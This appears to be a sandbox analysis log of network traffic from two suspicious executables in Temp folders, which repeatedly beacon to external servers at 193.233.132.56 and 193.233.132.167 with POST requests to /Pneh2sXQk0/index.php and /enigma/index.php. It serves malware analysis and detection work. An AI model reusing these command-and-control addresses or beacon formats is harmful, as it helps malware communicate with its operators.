                                                                                                                                                                                                                                      Apr 19, 2024 03:34:49.224848032 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1054192.168.2.550908193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:49.480621099 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:49.736601114 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1055192.168.2.550909193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:49.480627060 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:49.724203110 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1056192.168.2.550910193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:49.982727051 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:50.237401009 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1057192.168.2.550911193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:50.104626894 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:50.350965977 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1058192.168.2.550912193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:50.602591991 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:50.848377943 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1059192.168.2.550913193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:50.605102062 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:50.857984066 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1060192.168.2.550914193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:51.096148014 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:51.344213009 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1061192.168.2.550915193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:51.215562105 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:51.463217020 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1062192.168.2.550916193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:51.702980042 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:51.947644949 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1063192.168.2.550917193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:51.708405972 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:51.953108072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1064192.168.2.550918193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:52.199795961 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:52.453732967 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1065192.168.2.550919193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:52.307921886 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:52.556504011 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1066192.168.2.550920193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:52.811947107 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:53.064080000 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1067192.168.2.550921193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:52.819617987 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:53.064095020 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1068192.168.2.550922193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:53.315766096 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:53.564523935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1069192.168.2.550923193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:53.423361063 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:53.674483061 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1070192.168.2.550924193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
